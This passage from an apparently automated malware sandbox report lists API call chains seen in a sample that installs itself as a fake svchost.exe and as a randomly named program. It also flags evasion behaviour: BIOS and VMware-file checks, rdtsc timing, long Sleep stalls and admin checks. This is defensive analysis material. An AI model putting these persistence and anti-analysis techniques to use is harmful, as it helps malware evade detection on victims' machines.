ateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_013F6CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_013E1170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_013ED970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_01402B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_01402BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_014025C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,6_2_013FADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_01401460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_01403CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_01403F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_013F5720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_013E7FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_013E3610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_013FCE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_013E1660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_01401690
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,8_2_01526CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,8_2_01511170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,8_2_0151D970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,8_2_01532B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,8_2_01532BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,8_2_015325C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,8_2_0152ADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,8_2_01531460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,8_2_01533CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,8_2_01533F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,8_2_01525720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,8_2_01517FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,8_2_01511660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,8_2_01513610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,8_2_0152CE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,8_2_01531690
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403A20
Source: C:\Users\user\Desktop\uavINoSIQh.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-30546
Source: C:\Users\user\Desktop\uavINoSIQh.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-30579
Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-82782
Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-82638
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLL
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026578A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2986
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1266
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1293
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2780
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026579D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_026579D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_013379D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_013379D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_013F79D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015279D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,8_2_015279D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.5 %
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.6 %
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeAPI coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep count: 2986 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep time: -298600s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7784Thread sleep count: 1266 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7784Thread sleep time: -126600s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7788Thread sleep count: 1293 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7788Thread sleep time: -129300s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep count: 2780 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7504Thread sleep time: -278000s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7448Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02669910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02669910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02647680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02647680
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_0266DA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_0266DAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265D120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0265E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_0265E6B0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0133D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_0133D120
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01349910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01349910
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_0134DA50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0134DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_0134DAE8
